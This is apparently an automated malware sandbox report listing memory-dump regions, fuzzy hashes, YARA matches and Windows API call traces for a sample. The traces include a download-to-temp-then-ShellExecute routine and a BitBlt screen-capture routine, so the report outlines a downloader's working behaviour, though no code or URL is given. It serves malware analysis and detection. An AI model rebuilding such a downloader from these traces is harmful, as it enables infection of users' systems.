                                                              • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                              • Instruction ID: eeda33b33dff9b20f07bdfbdd9f4ad6545a383daf2adb216929d4437a8c9450c
                                                              • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                              • Instruction Fuzzy Hash: 13616731E00B04EADF38FB6C8980BBF6F959F41A48F04085BE852DB3C6D7169982CB55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                              • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                              • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                              • Instruction ID: 99144836b274ddb659fc66beb18442937b241524431016a47afc579ec539c171
                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                              • Instruction Fuzzy Hash: A48140B22190A34EEF69467E847453FFFE15A821A530A079FD4F2CB2C5EF248665D720
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 58b9be14918f1d440f00fc37e96827639e54099312ecb86735a08bdafa71ead0
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 1311E77720004247DE58CB3ED8B46BBEF95EBC7268B2D56BBD0414B758D322E145D620
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 95387b00ceea96303a7758962d3c26b9083f90cdf35009b3d63e7db42173688c
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: FE117C72380200AFD744DF59DC81FA677EAFB99320B298166ED09CB312DA75E842C760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 8d0a441c2d4b0705bf0afeee984720ee9befd2432816eb00777e17293a30e26e
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: 14012672A126008FDF21CF60C904BEB33F5FB86206F1554B6D92AD7381E370A841CB80
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                              • GetClientRect.USER32(?,?), ref: 0040214A
                                                              • GetDC.USER32(?), ref: 00402151
                                                              • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                              • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                              • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                              • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                              • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                              • _wcslen.LIBCMT ref: 0040227F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                              • String ID: Tahoma
                                                              • API String ID: 3832963559-3580928618
                                                              • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                              • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                              • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                              • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                              APIs
                                                              • DestroyWindow.USER32(?), ref: 004025CD
                                                              • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                              • ReleaseCapture.USER32 ref: 004025F2
                                                              • GetDC.USER32(00000000), ref: 00402619
                                                              • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                              • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                              • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                              • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                              • DeleteFileW.KERNEL32(?), ref: 00402731
                                                              • DeleteDC.GDI32(00000000), ref: 00402738
                                                              • DeleteObject.GDI32(00000000), ref: 0040273F
                                                              • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                              • DestroyWindow.USER32(?), ref: 00402754
                                                              • SetCapture.USER32(?), ref: 004027A1
                                                              • GetDC.USER32(00000000), ref: 004027D5
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                              • GetKeyState.USER32(0000001B), ref: 004027F8
                                                              • DestroyWindow.USER32(?), ref: 0040280D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                              • String ID: gya
                                                              • API String ID: 2545303185-1989253062
                                                              • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                              • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                              • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                              • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                              • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                              • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                              • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                              • Instruction ID: ea4dd1e2edb3804b974ab9388d5c5612ae3dc984f0881e9333345666a15f48f5
                                                              • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                              • Instruction Fuzzy Hash: 7DB18C71A002099FDF21DF69C890BAEBBF5BF08304F14456FE495A7351EB75A841CB20
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                              • _free.LIBCMT ref: 0043A631
                                                                • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                              • _free.LIBCMT ref: 0043A653
                                                              • _free.LIBCMT ref: 0043A668
                                                              • _free.LIBCMT ref: 0043A673
                                                              • _free.LIBCMT ref: 0043A695
                                                              • _free.LIBCMT ref: 0043A6A8
                                                              • _free.LIBCMT ref: 0043A6B6
                                                              • _free.LIBCMT ref: 0043A6C1
                                                              • _free.LIBCMT ref: 0043A6F9
                                                              • _free.LIBCMT ref: 0043A700
                                                              • _free.LIBCMT ref: 0043A71D
                                                              • _free.LIBCMT ref: 0043A735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                              • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                              • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                              • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 024AA8A3
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C0F
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C21
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C33
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C45
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C57
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C69
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C7B
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C8D
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9C9F
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CB1
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CC3
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CD5
                                                                • Part of subcall function 024A9BF2: _free.LIBCMT ref: 024A9CE7
                                                              • _free.LIBCMT ref: 024AA898
                                                                • Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
                                                                • Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9
                                                              • _free.LIBCMT ref: 024AA8BA
                                                              • _free.LIBCMT ref: 024AA8CF
                                                              • _free.LIBCMT ref: 024AA8DA
                                                              • _free.LIBCMT ref: 024AA8FC
                                                              • _free.LIBCMT ref: 024AA90F
                                                              • _free.LIBCMT ref: 024AA91D
                                                              • _free.LIBCMT ref: 024AA928
                                                              • _free.LIBCMT ref: 024AA960
                                                              • _free.LIBCMT ref: 024AA967
                                                              • _free.LIBCMT ref: 024AA984
                                                              • _free.LIBCMT ref: 024AA99C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                              • Instruction ID: 61d5de76b14839442d11903472a2cdec6576f1d17c1d549a5c928842c304e09d
                                                              • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                              • Instruction Fuzzy Hash: 963169316006109FEB30AF3AD864B5BB7FABF20790F15486FE449D7650EB75E890CA64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                              • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                              • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                              • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                              APIs
                                                              • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472C7E
                                                              • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02472C94
                                                              • GetTempPathW.KERNEL32(00000105,?), ref: 02472CB0
                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02472CC6
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02472CFF
                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02472D3B
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02472D58
                                                              • ShellExecuteExW.SHELL32(?), ref: 02472DCF
                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 02472DE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                              • String ID: <
                                                              • API String ID: 838076374-4251816714
                                                              • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                              • Instruction ID: 22b57108b106403687976060af338e9340447ede32335b889625f8e81898c464
                                                              • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                              • Instruction Fuzzy Hash: 15414F7190021DAFEB20DF659C85FEAB7BCFF05745F0080EAA559A2150DFB09E858FA4
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
                                                              • GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
                                                              • GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$ErrorLast
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2340687224-4050573280
                                                              • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                              • Instruction ID: be539c59c0a4feddeb50347d1f5abeb56d576b029bf47a9ed791a1a492c616bd
                                                              • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                              • Instruction Fuzzy Hash: A1217CB1914651BFE7107FB4DC08A5EBBA8EF05B16F004A2AF555E3640CBBC94418FA8
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0248F228,00000004,02487D87,00000004,02488069), ref: 0248EEF9
                                                              • GetLastError.KERNEL32(?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000,?), ref: 0248EF05
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,0248F228,00000004,02487D87,00000004,02488069,?,02488799,?,00000008,0248800D,00000000,?,?,00000000), ref: 0248EF15
                                                              • GetProcAddress.KERNEL32(00000000,00447430), ref: 0248EF2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF41
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF58
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF6F
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF86
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0248EF9D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$ErrorLast
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2340687224-4050573280
                                                              • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                              • Instruction ID: 38840c7213b1f9bc860e98fb0ddd366cafa539f947be498571399ad82e86b70b
                                                              • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                              • Instruction Fuzzy Hash: 2E218EB1914751BFE7107FA4DC08A5ABBECEF05B16F004A2BF555E3640CBBC94418BA8
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
                                                              • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
                                                              • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02482507
                                                              • GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
                                                              • GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02482552
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                              • String ID: kernel32.dll
                                                              • API String ID: 4179531150-1793498882
                                                              • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                              • Instruction ID: 64c3c52ceab967ea1986fba65a5ecdcf1e2e5302cd2743fb97272074f9df90ec
                                                              • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                              • Instruction Fuzzy Hash: E711C2759103517FE710BBB5AC59A6F3BECDE06B12720052BB801E2291EBB8D5008A6C
                                                              APIs
                                                              • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                              • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                              • String ID: pContext$switchState
                                                              • API String ID: 3151764488-2660820399
                                                              • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                              • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                              • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                              • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                              • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                              • SafeRWList.LIBCONCRT ref: 00419798
                                                                • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                              • GetLastError.KERNEL32 ref: 004197B9
                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                              • String ID: eventObject
                                                              • API String ID: 1999291547-1680012138
                                                              • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                              • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
